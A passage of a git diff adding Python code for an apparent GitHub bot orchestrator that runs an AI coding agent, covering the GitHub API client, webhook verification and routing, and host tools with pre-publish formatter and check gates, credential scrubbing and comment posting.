[] + out.append( + IssueSummary( + repo=repo, + number=int(item["number"]), + title=str(item.get("title") or ""), + state=str(item.get("state") or "open"), + author=str(user.get("login") or ""), + labels=tuple(str(lbl["name"]) if isinstance(lbl, dict) else str(lbl) for lbl in labels_raw), + comments=int(item.get("comments") or 0), + updated_at=str(item.get("updated_at") or ""), + created_at=str(item.get("created_at") or ""), + html_url=str(item.get("html_url") or ""), + ) + ) + return out + + async def list_comments(self, repo: str, number: int) -> list[CommentInfo]: + data = await self.request("GET", f"/repos/{repo}/issues/{number}/comments", params={"per_page": 100}) + return [_comment_from_payload(item) for item in (data or [])] + + async def list_review_comments(self, repo: str, pr_number: int) -> list[ReviewCommentInfo]: + """List inline review comments on a PR (the ones attached to a path:line).""" + data = await self.request( + "GET", + f"/repos/{repo}/pulls/{pr_number}/comments", + params={"per_page": 100}, + ) + out: list[ReviewCommentInfo] = [] + for item in data or []: + user = item.get("user") or {} + line = item.get("line") + if not isinstance(line, int): + orig = item.get("original_line") + line = orig if isinstance(orig, int) else None + out.append( + ReviewCommentInfo( + id=int(item.get("id") or 0), + author=str(user.get("login") or ""), + body=str(item.get("body") or ""), + path=str(item.get("path") or ""), + line=line, + created_at=str(item.get("created_at") or ""), + ) + ) + return out + + async def list_pr_reviews(self, repo: str, pr_number: int) -> list[PullRequestReviewInfo]: + """List top-level reviews on a PR. Empty-body reviews are skipped — they + carry no novel text beyond what the inline comments + merge state convey.""" + data = await self.request( + "GET", + f"/repos/{repo}/pulls/{pr_number}/reviews", + params={"per_page": 100}, + ) + out: list[PullRequestReviewInfo] = [] + for item in data or []: + user = item.get("user") or {} + body = str(item.get("body") or "").strip() + if not body: + continue + out.append( + PullRequestReviewInfo( + id=int(item.get("id") or 0), + author=str(user.get("login") or ""), + body=body, + state=str(item.get("state") or ""), + submitted_at=str(item.get("submitted_at") or item.get("created_at") or ""), + ) + ) + return out + + async def post_comment(self, repo: str, number: int, body: str) -> CommentInfo: + data = await self.request( + "POST", + f"/repos/{repo}/issues/{number}/comments", + json={"body": body}, + ) + return _comment_from_payload(data) + + async def open_pull_request( + self, + *, + repo: str, + head: str, + base: str, + title: str, + body: str, + draft: bool = False, + maintainer_can_modify: bool = True, + ) -> PullRequestInfo: + data = await self.request( + "POST", + f"/repos/{repo}/pulls", + json={ + "title": title, + "body": body, + "head": head, + "base": base, + "draft": draft, + "maintainer_can_modify": maintainer_can_modify, + }, + ) + return _pr_from_payload(repo, data) + + async def request_reviewers( + self, + *, + repo: str, + pr_number: int, + reviewers: list[str] | None = None, + team_reviewers: list[str] | None = None, + ) -> None: + payload: dict[str, Any] = {} + if reviewers: + payload["reviewers"] = reviewers + if team_reviewers: + payload["team_reviewers"] = team_reviewers + if not payload: + return + await self.request( + "POST", + f"/repos/{repo}/pulls/{pr_number}/requested_reviewers", + json=payload, + ) + + async def add_issue_labels(self, repo: str, number: int, labels: list[str]) -> tuple[str, ...]: + """Append labels to an issue (or PR). Returns the full label set after the add. + + Uses `POST /repos/{owner}/{repo}/issues/{n}/labels` which is *additive* — + we never remove or overwrite existing labels. + """ + if not labels: + return () + data = await self.request( + "POST", + f"/repos/{repo}/issues/{number}/labels", + json={"labels": labels}, + ) + return tuple(str(lbl["name"]) if isinstance(lbl, dict) else str(lbl) for lbl in (data or [])) + + async def add_assignees(self, repo: str, number: int, assignees: list[str]) -> None: + if not assignees: + return + await self.request( + "POST", + f"/repos/{repo}/issues/{number}/assignees", + json={"assignees": assignees}, + ) + + async def list_comment_reactions(self, repo: str, comment_id: int) -> tuple[ReactionInfo, ...]: + """Reactions on an issue comment, filtered server-side to 👎 (`content=-1`). + + The auto-close scheduler only consults 👎 reactions; filtering server-side + keeps payloads small even on noisy threads. Returns reactions in the + order GitHub provides (creation order). + """ + data = await self.request( + "GET", + f"/repos/{repo}/issues/comments/{comment_id}/reactions", + params={"content": "-1", "per_page": 100}, + ) + return tuple(_reaction_from_payload(item) for item in (data or [])) + + async def close_issue(self, repo: str, number: int, *, reason: str = "completed") -> None: + """Close an issue with `state_reason` (`completed`/`not_planned`/`reopened`).""" + await self.request( + "PATCH", + f"/repos/{repo}/issues/{number}", + json={"state": "closed", "state_reason": reason}, + ) + + async def get_authenticated_login(self) -> str: + data = await self.request("GET", "/user") + return str(data["login"]) + + +def _repo_from_payload(data: Mapping[str, Any]) -> RepoInfo: + return RepoInfo( + full_name=str(data["full_name"]), + default_branch=str(data["default_branch"]), + clone_url=str(data["clone_url"]), + private=bool(data.get("private", False)), + ) + + +def _issue_from_payload(repo: str, data: Mapping[str, Any]) -> IssueInfo: + labels_raw = data.get("labels") or [] + labels = tuple(str(lbl["name"]) if isinstance(lbl, dict) else str(lbl) for lbl in labels_raw) + user = data.get("user") or {} + return IssueInfo( + repo=repo, + number=int(data["number"]), + title=str(data.get("title") or ""), + body=str(data.get("body") or ""), + state=str(data.get("state") or "open"), + author=str(user.get("login") or ""), + labels=labels, + is_pull_request="pull_request" in data, + ) + + +def _pr_from_payload(repo: str, data: Mapping[str, Any]) -> PullRequestInfo: + head = data.get("head") or {} + base = data.get("base") or {} + user = data.get("user") or {} + head_repo = head.get("repo") if isinstance(head, Mapping) else None + return PullRequestInfo( + repo=repo, + number=int(data["number"]), + html_url=str(data["html_url"]), + head_ref=str(head.get("ref") or "") if isinstance(head, Mapping) else "", + base_ref=str(base.get("ref") or "") if isinstance(base, Mapping) else "", + state=str(data.get("state") or "open"), + author=str(user.get("login") or "") if isinstance(user, Mapping) else "", + head_repo=str(head_repo.get("full_name") or "") if isinstance(head_repo, Mapping) else "", + ) + + +def _comment_from_payload(data: Mapping[str, Any]) -> CommentInfo: + user = data.get("user") or {} + return CommentInfo( + id=int(data["id"]), + author=str(user.get("login") or ""), + body=str(data.get("body") or ""), + created_at=str(data.get("created_at") or ""), + ) + + +def _reaction_from_payload(data: Mapping[str, Any]) -> ReactionInfo: + user = data.get("user") or {} + return ReactionInfo( + content=str(data.get("content") or ""), + user_login=str(user.get("login") or "") if isinstance(user, Mapping) else "", + user_type=str(user.get("type") or "") if isinstance(user, Mapping) else "", + ) + + +def parse_issue_payload(payload: Mapping[str, Any]) -> tuple[RepoInfo, IssueInfo]: + """Build typed records from a webhook payload (issues.opened, etc.).""" + repo_payload = payload["repository"] + repo = _repo_from_payload(repo_payload) + issue = _issue_from_payload(repo.full_name, payload["issue"]) + return repo, issue + + +__all__ = [ + "ACCEPT", + "API_VERSION", + "CommentInfo", + "GitHubClient", + "GitHubError", + "IssueInfo", + "IssueSummary", + "PullRequestInfo", + "PullRequestReviewInfo", + "ReactionInfo", + "RepoInfo", + "ReviewCommentInfo", + "parse_issue_payload", +] diff --git a/python/robomp/src/github_events.py b/python/robomp/src/github_events.py new file mode 100644 index 000000000..3de98f35f --- /dev/null +++ b/python/robomp/src/github_events.py @@ -0,0 +1,330 @@ +"""Typed webhook payload parsing + dispatch routing.""" + +from __future__ import annotations + +import hashlib +import hmac +import logging +import re +from collections.abc import Callable, Mapping +from dataclasses import dataclass +from typing import Any, Literal + +from robomp.db import issue_key +from robomp.pragmas import parse_pragmas + +log = logging.getLogger(__name__) + +Decision = Literal["queue", "skip"] + + +@dataclass(slots=True, frozen=True) +class RouteDecision: + decision: Decision + task: str | None + repo: str | None + issue_key: str | None + reason: str + submitter: str | None = None + association: str | None = None + directive: bool = False + directive_body: str | None = None + directive_author: str | None = None + directive_pragmas: tuple[tuple[str, str], ...] = () + + @property + def should_queue(self) -> bool: + return self.decision == "queue" + + +def verify_signature(secret: str, body: bytes, signature_header: str | None) -> bool: + """Constant-time HMAC-SHA256 verification of `X-Hub-Signature-256`.""" + if not signature_header or not signature_header.startswith("sha256="): + return False + expected = hmac.new(secret.encode("utf-8"), body, hashlib.sha256).hexdigest() + provided = signature_header.removeprefix("sha256=") + return hmac.compare_digest(expected, provided) + + +def _repo_full_name(payload: Mapping[str, Any]) -> str | None: + repo = payload.get("repository") + if isinstance(repo, dict): + full = repo.get("full_name") + if isinstance(full, str): + return full + return None + + +PrIssueResolver = Callable[[str, int], str | None] | None + + +def _is_bot_account(user: Mapping[str, Any] | None, bot_login: str) -> bool: + if not isinstance(user, Mapping): + return False + login = str(user.get("login") or "") + if not login: + return False + if login == bot_login: + return True + if login.endswith("[bot]"): + return True + if str(user.get("type") or "") == "Bot": + return True + return False + + +def _submitter_info(obj: Mapping[str, Any] | None) -> tuple[str | None, str | None]: + """Extract `(login, author_association)` from an issue/comment object.""" + if not isinstance(obj, Mapping): + return None, None + user = obj.get("user") + login: str | None = None + if isinstance(user, Mapping): + raw = user.get("login") + if isinstance(raw, str) and raw: + login = raw + assoc = obj.get("author_association") + return login, (str(assoc) if isinstance(assoc, str) and assoc else None) + + +def extract_mention(body: str | None, bot_login: str) -> str | None: + """Return `body` with `@<bot_login>` mentions stripped, or None if no mention. + + Match is case-insensitive and word-boundary aware (hyphens in logins are + part of the token, so `@robomp-bot` does NOT match `@robomp-bot-extra`). + """ + if not isinstance(body, str) or not body: + return None + login = bot_login.strip() + if not login: + return None + pattern = re.compile( + rf"(?<![A-Za-z0-9_-])@{re.escape(login)}(?![A-Za-z0-9_-])", + re.IGNORECASE, + ) + if not pattern.search(body): + return None + stripped = pattern.sub("", body) + # Collapse the whitespace the strip leaves behind without mangling the rest. + stripped = re.sub(r"[ \t]+", " ", stripped) + stripped = re.sub(r"\n[ \t]+", "\n", stripped) + return stripped.strip() + + +def is_maintainer( + login: str | None, + association: str | None, + *, + maintainers: frozenset[str], +) -> bool: + """A maintainer is anyone in `maintainers` or with a trusted association.""" + if isinstance(login, str) and login and login.lower() in maintainers: + return True + if isinstance(association, str) and association.upper() in TRUSTED_ASSOCIATIONS: + return True + return False + + +def route( + event_type: str, + payload: Mapping[str, Any], + *, + allowlist: frozenset[str], + bot_login: str, + maintainers: frozenset[str] = frozenset(), + reviewer_bots: frozenset[str] = frozenset(), + resolve_issue_from_pr: PrIssueResolver = None, +) -> RouteDecision: + """Decide whether and how to handle a webhook event. + + `resolve_issue_from_pr(repo, pr_number)` maps a PR number back to its + originating-issue key (e.g. `octo/widget#42`). PR-derived events prefer + that key so follow-ups serialize with the original issue. If the mapping + is missing, the event is still actionable and falls back to the PR's own + issue key (`octo/widget#1080`). + """ + repo = _repo_full_name(payload) + if repo is None or repo.lower() not in allowlist: + return RouteDecision("skip", None, repo, None, "repo not on allowlist") + + action = str(payload.get("action") or "") + + def _resolve_pr_key(pr_number: int) -> str: + if resolve_issue_from_pr is not None: + resolved = resolve_issue_from_pr(repo, pr_number) # type: ignore[arg-type] + if resolved: + return resolved + return issue_key(repo, pr_number) # type: ignore[arg-type] + + def _reviewer_bot_login(user: Mapping[str, Any] | None) -> str | None: + """Return the lowercased login if this user is a configured reviewer bot.""" + if not isinstance(user, Mapping): + return None + login = str(user.get("login") or "").lower() + return login if login and login in reviewer_bots else None + + def _directive_kwargs(comment: Mapping[str, Any] | None, login: str | None, assoc: str | None) -> dict[str, Any]: + """Decide whether this comment is a directive (reviewer-bot OR maintainer-mention).""" + if not isinstance(comment, Mapping): + return {} + body = str(comment.get("body") or "") + rb_login = _reviewer_bot_login(comment.get("user")) + if rb_login is not None: + # Reviewer bots like chatgpt-codex-connector speak authoritatively + # already — no `@bot` mention required; pass the full body through. + cleaned, pragmas = parse_pragmas(body) + return { + "directive": True, + "directive_body": cleaned, + "directive_author": rb_login, + "directive_pragmas": pragmas, + } + if not is_maintainer(login, assoc, maintainers=maintainers): + return {} + stripped = extract_mention(body, bot_login) + if stripped is None: + return {} + cleaned, pragmas = parse_pragmas(stripped) + return { + "directive": True, + "directive_body": cleaned, + "directive_author": login, + "directive_pragmas": pragmas, + } + + if event_type == "issues": + issue = payload.get("issue") or {} + if "pull_request" in issue: + return RouteDecision("skip", None, repo, None, "issue is a pull request") + number = issue.get("number") + if not isinstance(number, int): + return RouteDecision("skip", None, repo, None, "issue missing number") + key = issue_key(repo, number) + if action == "opened": + login, assoc = _submitter_info(issue) + return RouteDecision( + "queue", "triage_issue", repo, key, "issues.opened", submitter=login, association=assoc + ) + if action == "closed": + # Cleanup is a lifecycle event, not a user submission; no rate-limit subject. + return RouteDecision("queue", "cleanup_workspace", repo, key, "issues.closed") + return RouteDecision("skip", None, repo, key, f"issues.{action} ignored") + + if event_type == "issue_comment" and action == "created": + comment = payload.get("comment") or {} + rb_login = _reviewer_bot_login(comment.get("user")) + if rb_login is None and _is_bot_account(comment.get("user"), bot_login): + return RouteDecision("skip", None, repo, None, "bot/self comment") + issue = payload.get("issue") or {} + number = issue.get("number") + if not isinstance(number, int): + return RouteDecision("skip", None, repo, None, "comment missing issue number") + if "pull_request" in issue: + # Conversation comment on a PR. The PR number lives at issue.number + # on this payload type. Prefer the originating issue key when the + # DB has it, but do not drop bot-authored follow-ups just because + # the PR mapping was lost; the worker can recover from the PR + # branch or handle the PR directly. + key = _resolve_pr_key(number) + login, assoc = _submitter_info(comment) + return RouteDecision( + "queue", + "handle_pr_conversation", + repo, + key, + f"issue_comment.created on PR #{number}", + submitter=login, + association=assoc, + **_directive_kwargs(comment, login, assoc), + ) + key = issue_key(repo, number) + login, assoc = _submitter_info(comment) + return RouteDecision( + "queue", + "handle_comment", + repo, + key, + "issue_comment.created", + submitter=login, + association=assoc, + **_directive_kwargs(comment, login, assoc), + ) + + if event_type == "pull_request_review_comment" and action == "created": + comment = payload.get("comment") or {} + rb_login = _reviewer_bot_login(comment.get("user")) + if rb_login is None and _is_bot_account(comment.get("user"), bot_login): + return RouteDecision("skip", None, repo, None, "bot/self review comment") + pr = payload.get("pull_request") or {} + pr_user = pr.get("user") or {} + if str(pr_user.get("login") or "") != bot_login: + return RouteDecision("skip", None, repo, None, "PR not authored by bot") + number = pr.get("number") + if not isinstance(number, int): + return RouteDecision("skip", None, repo, None, "PR missing number") + key = _resolve_pr_key(number) + login, assoc = _submitter_info(comment) + return RouteDecision( + "queue", + "handle_review", + repo, + key, + "pull_request_review_comment.created", + submitter=login, + association=assoc, + **_directive_kwargs(comment, login, assoc), + ) + + if event_type == "pull_request" and action == "closed": + pr = payload.get("pull_request") or {} + pr_user = pr.get("user") or {} + if str(pr_user.get("login") or "") != bot_login: + return RouteDecision("skip", None, repo, None, "PR not bot-authored") + if not bool(pr.get("merged")): + return RouteDecision("skip", None, repo, None, "PR closed without merge") + number = pr.get("number") + if not isinstance(number, int): + return RouteDecision("skip", None, repo, None, "PR missing number") + return RouteDecision("queue", "cleanup_workspace", repo, _resolve_pr_key(number), "pull_request.merged") + + return RouteDecision("skip", None, repo, None, f"{event_type}.{action} not handled") + + +TRUSTED_ASSOCIATIONS: frozenset[str] = frozenset({"OWNER", "MEMBER", "COLLABORATOR"}) +"""GitHub `author_association` values that bypass per-user rate limiting.""" + + +def rate_limit_cap( + login: str, + association: str | None, + *, + unlimited: frozenset[str], + default: int, + contributor: int, +) -> int | None: + """Return the per-window submission cap for a submitter, or `None` for unlimited. + + Precedence: explicit `unlimited` allowlist > trusted GitHub association + (`OWNER`/`MEMBER`/`COLLABORATOR`) > `CONTRIBUTOR` tier > default tier. + """ + if login.lower() in unlimited: + return None + if association: + upper = association.upper() + if upper in TRUSTED_ASSOCIATIONS: + return None + if upper == "CONTRIBUTOR": + return contributor + return default + + +__all__ = [ + "Decision", + "RouteDecision", + "TRUSTED_ASSOCIATIONS", + "extract_mention", + "is_maintainer", + "rate_limit_cap", + "route", + "verify_signature", +] diff --git a/python/robomp/src/host_tools.py b/python/robomp/src/host_tools.py new file mode 100644 index 000000000..70abbda22 --- /dev/null +++ b/python/robomp/src/host_tools.py @@ -0,0 +1,1218 @@ +"""Host tools exposed to the agent through `omp_rpc.host_tool`. + +The agent uses these for any side effect that touches GitHub, the +reproduction transcript store, or the orchestrator's bookkeeping. +""" + +from __future__ import annotations + +import asyncio +import json +import logging +import os +import subprocess +import time +from collections.abc import Callable, Mapping +from dataclasses import dataclass +from datetime import UTC, datetime, timedelta +from pathlib import Path +from typing import Any, NoReturn + +from omp_rpc import HostTool, HostToolContext, RpcCommandError, host_tool + +from robomp import persona +from robomp.config import Settings +from robomp.db import Database, issue_key +from robomp.git_ops import GitCommandError, HeadDriftError +from robomp.github_backend import GitHubBackend +from robomp.github_client import GitHubError, IssueInfo, RepoInfo +from robomp.sandbox import ( + GitTransport, + Workspace, + _prepare_slot_runtime_env, + _safe_directory_env, + _share_git_metadata_with_slots, + _slot_permissions_active, + _slot_subprocess_kwargs, + rename_workspace_branch, + validate_branch_slug, + workspace_key, +) + +log = logging.getLogger(__name__) +_PRE_PR_FIX_COMMAND = ("bun", "run", "fix") +_PRE_PR_CHECK_COMMAND = ("bun", "check") +_REPO_COMMAND_SCRUBBED_ENV_KEYS: tuple[str, ...] = ( + "GITHUB_TOKEN", + "GITHUB_WEBHOOK_SECRET", + "ROBOMP_REPLAY_TOKEN", + "ROBOMP_GH_PROXY_HMAC_KEY", +) +_AGENT_HOME = Path("/srv/agent-home") +_PRE_PR_FIX_TIMEOUT_SECONDS = 600.0 +_PRE_PR_CHECK_TIMEOUT_SECONDS = 600.0 +_PRE_PR_CHECK_MAX_OUTPUT = 12_000 +_PRE_PR_FIX_COMMIT_SUBJECT = "style: bun run fix" + + +@dataclass(slots=True) +class AbortController: + """Mutable handoff between the `abort_task` host tool and the worker. + + `signal()` is called from the host-tool thread to request an irrecoverable + teardown of the omp subprocess. The worker pre-populates `stop` with a + thread-safe terminator (the same one used for queue cancellation and the + hard-timeout watchdog), and inspects `triggered` after `prompt_and_wait` + unblocks to decide whether the resulting `RpcError` is an intentional + abort (swallow, mark event `done`) vs an actual failure (propagate). + """ + + triggered: bool = False + reason: str = "" + stop: Callable[[], None] | None = None + + def signal(self, reason: str) -> None: + # Idempotent. Only the first call records its reason; later calls are + # silent no-ops so a retry inside the tool can't overwrite the + # original diagnosis with a generic follow-up message. + if self.triggered: + return + self.triggered = True + self.reason = reason + if self.stop is not None: + self.stop() + + +@dataclass(slots=True, frozen=True) +class ToolBindings: + """Per-task closure that the host tools capture.""" + + db: Database + github: GitHubBackend + git_transport: GitTransport + repo: RepoInfo + issue: IssueInfo + workspace: Workspace + loop: asyncio.AbstractEventLoop + author_name: str + author_email: str + settings: Settings | None = None + # Number of the GitHub thread the inbound webhook arrived on. For an + # issue comment this is the issue; for a PR conversation or review + # comment it's the PR. `gh_post_comment` defaults its target here so + # the agent's reply lands on the thread the human is actually reading. + # `None` for tasks with no inbound thread (e.g. initial triage), in + # which case the originating issue is used. + inbound_thread_number: int | None = None + # True iff the inbound thread is a pull request. Triage tools + # (`classify_issue`, `set_issue_labels`) are not exposed on PR threads + # — the originating issue has already been classified and the PR + # itself does not carry triage labels. + inbound_is_pr: bool = False + slot_uid: int | None = None + # Set by the worker before launching omp. Carries the abort-task signal + # back out to the worker; `None` for unit tests that exercise tools + # without a live RpcClient. + abort: AbortController | None = None + + @property + def issue_key(self) -> str: + return issue_key(self.issue.repo, self.issue.number) + + @property + def default_comment_number(self) -> int: + return self.inbound_thread_number if self.inbound_thread_number is not None else self.issue.number + + +def _run_coro(loop: asyncio.AbstractEventLoop, coro: Any) -> Any: + """Block the agent thread until an async call completes on the worker loop.""" + future = asyncio.run_coroutine_threadsafe(coro, loop) + return future.result() + + +def _audit( + bindings: ToolBindings, name: str, args: Mapping[str, Any], result: Any | None = None, error: str | None = None +) -> None: + bindings.db.log_tool_call( + issue_key=bindings.issue_key, + tool=name, + args=args, + result=result if isinstance(result, Mapping) else ({"value": result} if result is not None else None), + error=error, + ) + + +def _raise_command(message: str) -> NoReturn: + raise RpcCommandError(message, error={"message": message}) + + +def _git_identity_env(author_name: str, author_email: str) -> dict[str, str]: + """Environment forcing agent git commits to use the configured bot identity.""" + return { + "GIT_AUTHOR_NAME": author_name, + "GIT_AUTHOR_EMAIL": author_email, + "GIT_COMMITTER_NAME": author_name, + "GIT_COMMITTER_EMAIL": author_email, + } + + +def _repo_command_env(bindings: ToolBindings) -> dict[str, str]: + """Environment for repo-owned commands (`bun`, formatter, local git). + + These commands execute code from the checked-out repository, so they must + not inherit GitHub credentials from the orchestrator. They also need the + exact same HOME/XDG/TMP/Bun cache paths as the agent process; otherwise + host-side pre-publish gates validate a different machine than the agent saw. + """ + env = os.environ.copy() + for key in _REPO_COMMAND_SCRUBBED_ENV_KEYS: + env[key] = "" + if _AGENT_HOME.is_dir(): + env["HOME"] = str(_AGENT_HOME) + env.update(_prepare_slot_runtime_env(bindings.workspace, bindings.slot_uid)) + env.update(_safe_directory_env(bindings.workspace.repo_dir)) + env.update(_git_identity_env(bindings.author_name, bindings.author_email)) + env["GIT_TERMINAL_PROMPT"] = "0" + return env + + +def _run_repo_command( + bindings: ToolBindings, + cmd: list[str] | tuple[str, ...], + *, + timeout: float | None = None, +) -> subprocess.CompletedProcess[str]: + """Run a repo-local command with agent-equivalent permissions and env.""" + return subprocess.run( + list(cmd), + cwd=str(bindings.workspace.repo_dir), + check=False, + capture_output=True, + text=True, + timeout=timeout, + env=_repo_command_env(bindings), + **_slot_subprocess_kwargs(bindings.slot_uid), + ) + + +def _has_bun_script(repo_dir: Path, name: str) -> bool: + """Return True iff `package.json` defines a `scripts.<name>` entry. + + A malformed or unreadable `package.json` is treated as "present" so the + repository-native error surfaces from `bun` instead of being silently + swallowed here. + """ + package_json = repo_dir / "package.json" + if not package_json.is_file(): + return False + try: + package = json.loads(package_json.read_text(encoding="utf-8")) + except (OSError, json.JSONDecodeError): + return True + if not isinstance(package, Mapping): + return True + scripts = package.get("scripts") + return isinstance(scripts, Mapping) and isinstance(scripts.get(name), str) + + +def _format_process_output(stdout: Any, stderr: Any) -> str: + parts: list[str] = [] + for stream in (stdout, stderr): + if isinstance(stream, bytes): + text = stream.decode(errors="replace") + elif isinstance(stream, str): + text = stream + elif stream is None: + continue + else: + text = str(stream) + text = text.strip() + if text: + parts.append(text) + output = "\n".join(parts) + if not output: + return "(no output)" + if len(output) <= _PRE_PR_CHECK_MAX_OUTPUT: + return output + return ( + f"... output truncated to last {_PRE_PR_CHECK_MAX_OUTPUT} characters ...\n{output[-_PRE_PR_CHECK_MAX_OUTPUT:]}" + ) + + +def _run_pre_publish_bun_fix( + bindings: ToolBindings, + args: Mapping[str, Any], + *, + tool_name: str, + stage: str, + skip_checks: bool = False, +) -> None: + """Run `bun run fix` then commit any working-tree diff as the bot. + + Silently no-ops when the repository does not define a `scripts.fix` + entry. Anything the formatter touches gets folded into a fresh + `style: bun run fix` commit so the downstream cleanliness gate sees a + pristine worktree. + + `tool_name` is the host tool calling this (audit attribution). + `stage` is the human-readable verb used in error wording — "open PR" + when called from `gh_open_pr`, "push" when called from `gh_push_branch`. + + `skip_checks` is the agent-supplied escape hatch: when True, the + formatter is NOT invoked and any post-fix commit is skipped, so a + broken-formatter situation on `main` (unrelated to the agent's diff) + doesn't strand the push forever. The dirty-tree gate still runs — we + never let uncommitted changes leak into a remote ref. + """ + if not _has_bun_script(bindings.workspace.repo_dir, "fix"): + return + # Dirty-tree gate BEFORE the formatter so any pre-existing uncommitted + # edit isn't silently swept into the `style: bun run fix` commit by the + # `git add -A` below. The agent owns the worktree end-to-end; any diff + # not already in a commit is a workflow bug it must resolve before we + # mutate the tree further. + pre_status = _run_repo_command(bindings, ["git", "status", "--porcelain", "--untracked-files=normal"]) + if pre_status.stdout.strip(): + dirty = "\n ".join(pre_status.stdout.strip().splitlines()) + msg = ( + f"refusing to {stage}: dirty worktree before `bun run fix`.\n " + f"{dirty}\n" + "Commit (or `git stash`) every change before invoking the formatter — " + "anything left uncommitted would be folded into the `style: bun run fix` " + "commit and silently land in the PR." + ) + _audit(bindings, tool_name, args, error=msg) + _raise_command(msg) + if skip_checks: + _audit( + bindings, + tool_name, + args, + result={"skipped": "bun_run_fix", "reason": "skip_checks=true"}, + ) + return + try: + proc = _run_repo_command(bindings, _PRE_PR_FIX_COMMAND, timeout=_PRE_PR_FIX_TIMEOUT_SECONDS) + except FileNotFoundError: + msg = f"refusing to {stage}: `bun run fix` is required before {stage}, but `bun` is not on PATH." + _audit(bindings, tool_name, args, error=msg) + _raise_command(msg) + except subprocess.TimeoutExpired as exc: + output = _format_process_output(exc.stdout, exc.stderr) + msg = ( + f"refusing to {stage}: `bun run fix` timed out before {stage}.\n" + f"{output}\n\n" + f"Investigate the hang, rerun the formatter, commit any resulting changes, " + f"and retry." + ) + _audit(bindings, tool_name, args, error=msg) + _raise_command(msg) + if proc.returncode != 0: + output = _format_process_output(proc.stdout, proc.stderr) + msg = ( + f"refusing to {stage}: `bun run fix` failed before {stage} (exit {proc.returncode}).\n" + f"{output}\n\n" + f"Resolve the formatter failure, rerun `bun run fix` successfully, commit any " + f"resulting changes, and retry." + ) + _audit(bindings, tool_name, args, error=msg) + _raise_command(msg) + + status = _run_repo_command(bindings, ["git", "status", "--porcelain", "--untracked-files=normal"]) + if not status.stdout.strip(): + return + + add = _run_repo_command(bindings, ["git", "add", "-A"]) + if add.returncode != 0: + err = (add.stderr or add.stdout).strip() + msg = f"refusing to {stage}: `git add -A` failed after `bun run fix`: {err}" + _audit(bindings, tool_name, args, error=msg) + _raise_command(msg) + commit = _run_repo_command( + bindings, + [ + "git", + "-c", + f"user.email={bindings.author_email}", + "-c", + f"user.name={bindings.author_name}", + "commit", + "-m", + _PRE_PR_FIX_COMMIT_SUBJECT, + ], + ) + if commit.returncode != 0: + err = (commit.stderr or commit.stdout).strip() + msg = f"refusing to {stage}: failed to commit `bun run fix` changes: {err}" + _audit(bindings, tool_name, args, error=msg) + _raise_command(msg) + + +def _run_pre_publish_bun_check( + bindings: ToolBindings, + args: Mapping[str, Any], + *, + tool_name: str, + stage: str, + skip_checks: bool = False, +) -> None: + """Run `bun check` before publishing. When `skip_checks=True` the check + is not invoked — used to escape pre-existing breakage on `main` that + the agent's diff did not cause. + """ + if skip_checks: + _audit( + bindings, + tool_name, + args, + result={"skipped": "bun_check", "reason": "skip_checks=true"}, + ) + return + if not _has_bun_script(bindings.workspace.repo_dir, "check"): + return + try: + proc = _run_repo_command(bindings, _PRE_PR_CHECK_COMMAND, timeout=_PRE_PR_CHECK_TIMEOUT_SECONDS) + except FileNotFoundError: + msg = f"refusing to {stage}: `bun check` is required before {stage}, but `bun` is not on PATH." + _audit(bindings, tool_name, args, error=msg) + _raise_command(msg) + except subprocess.TimeoutExpired as exc: + output = _format_process_output(exc.stdout, exc.stderr) + msg = ( + f"refusing to {stage}: `bun check` timed out before {stage}.\n" + f"{output}\n\n" + f"Fix the check hang/failure, rerun `bun check`, commit any resulting changes, " + f"and retry." + ) + _audit(bindings, tool_name, args, error=msg) + _raise_command(msg) + if proc.returncode != 0: + output = _format_process_output(proc.stdout, proc.stderr) + msg = ( + f"refusing to {stage}: `bun check` failed before {stage} (exit {proc.returncode}).\n" + f"{output}\n\n" + f"Fix the reported failures, rerun `bun check` successfully, commit any resulting changes, " + f"and retry." + ) + _audit(bindings, tool_name, args, error=msg) + _raise_command(msg) + + +_AUTOCLOSE_INELIGIBLE_STATES: frozenset[str] = frozenset({"closed", "merged", "abandoned"}) + + +def _should_schedule_autoclose(bindings: ToolBindings, target_number: int) -> float | None: + """Return the configured close window (hours) when this comment should + schedule an auto-close; ``None`` otherwise. + + Conditions: feature enabled in `Settings`, the comment lands on the + originating issue (not a different number, not a PR thread), the issue is + classified as `question`, and the issue is not already in a terminal + state (closed/merged/abandoned). + """ + settings = bindings.settings + if settings is None or not settings.question_autoclose_enabled: + return None + hours = float(settings.question_autoclose_hours) + if hours <= 0: + return None + if target_number != bindings.issue.number: + return None + if bindings.inbound_is_pr: + return None + row = bindings.db.get_issue(bindings.issue_key) + if row is None or row.classification != "question": + return None + if row.state in _AUTOCLOSE_INELIGIBLE_STATES: + return None + return hours + + +def _schedule_autoclose(bindings: ToolBindings, *, comment_id: int, hours: float) -> str | None: + """Insert (or refresh) a `pending_closures` row for the bot's answer. + + Failures are logged but never poisoned back to the agent — the human has + already seen the comment and the orchestrator's bookkeeping shouldn't + surface as a tool error. + """ + close_at_dt = datetime.now(UTC) + timedelta(hours=hours) + close_at = close_at_dt.strftime("%Y-%m-%dT%H:%M:%S.%fZ") + try: + bindings.db.upsert_pending_closure( + issue_key=bindings.issue_key, + repo=bindings.issue.repo, + number=bindings.issue.number, + comment_id=comment_id, + issue_author=bindings.issue.author, + close_at=close_at, + ) + except Exception as exc: # pragma: no cover - defensive + log.exception( + "autoclose schedule failed", + extra={"issue_key": bindings.issue_key, "comment_id": comment_id, "error": str(exc)}, + ) + return None + return close_at + + +# ---------- gh_post_comment ---------- +def _build_post_comment(bindings: ToolBindings) -> HostTool[Any, Any]: + def execute(args: dict[str, Any], _ctx: HostToolContext[Any]) -> str: + body = args.get("body") + if not isinstance(body, str) or not body.strip(): + _raise_command("gh_post_comment requires a non-empty 'body'.") + target_number = bindings.default_comment_number + if isinstance(args.get("number"), int): + target_number = int(args["number"]) + # If this comment answers the originating question issue, append the + # 👎-to-keep-open suffix so the auto-close scheduler has a reaction + # surface to consult. + schedule_close = _should_schedule_autoclose(bindings, target_number) + body_to_post = body + if schedule_close is not None: + body_to_post = f"{body.rstrip()}\n\n{persona.question_autoclose_suffix(schedule_close)}" + try: + comment = _run_coro( + bindings.loop, + bindings.github.post_comment(bindings.repo.full_name, target_number, body_to_post), + ) + except GitHubError as exc: + _audit(bindings, "gh_post_comment", args, error=str(exc)) + _raise_command(f"GitHub rejected comment: {exc.status} {exc.message}") + audit_result: dict[str, Any] = {"comment_id": comment.id} + if schedule_close is not None: + scheduled_at = _schedule_autoclose( + bindings, + comment_id=comment.id, + hours=schedule_close, + ) + if scheduled_at is not None: + audit_result["scheduled_close_at"] = scheduled_at + _audit(bindings, "gh_post_comment", args, result=audit_result) + return 